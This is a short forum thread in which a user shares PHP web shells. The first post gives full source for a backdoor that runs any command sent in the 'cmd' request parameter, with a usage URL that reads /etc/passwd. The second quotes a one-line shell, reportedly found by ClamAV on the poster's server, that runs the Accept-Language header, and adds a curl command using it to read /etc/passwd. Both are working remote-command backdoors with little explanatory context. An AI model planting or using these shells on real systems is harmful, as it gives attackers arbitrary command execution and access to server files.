simple php backdoor

Let us talk about scripts, HTML, Perl, PHP, apache, etc.
Post Reply
User avatar
Stevyn
SysOp
Posts:1786
Joined:Mon Nov 09, 2009 10:03 am
Location:Japan
Contact:
simple php backdoor

Post by Stevyn » Thu Sep 20, 2018 6:03 pm

https://github.com/JohnTroony/php-websh ... ckdoor.php

Code: Select all

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->
Contact me directly: Ironfeatherbooks (@) gmail.com

Image

User avatar
Stevyn
SysOp
Posts:1786
Joined:Mon Nov 09, 2009 10:03 am
Location:Japan
Contact:

Re: simple php backdoor

Post by Stevyn » Sat Jun 15, 2019 3:35 pm

clamAV found this one on my server:

Code: Select all

<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE"));?>

https://informationonsecurity.blogspot. ... ading.html

example usage

Code: Select all

curl -H "Accept-Language: cat /etc/passwd" -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:72.0) Gecko/20132121 Firefox/19.0" http://192.168.110.114/webshells/48bytes.php

Contact me directly: Ironfeatherbooks (@) gmail.com

Image

Post Reply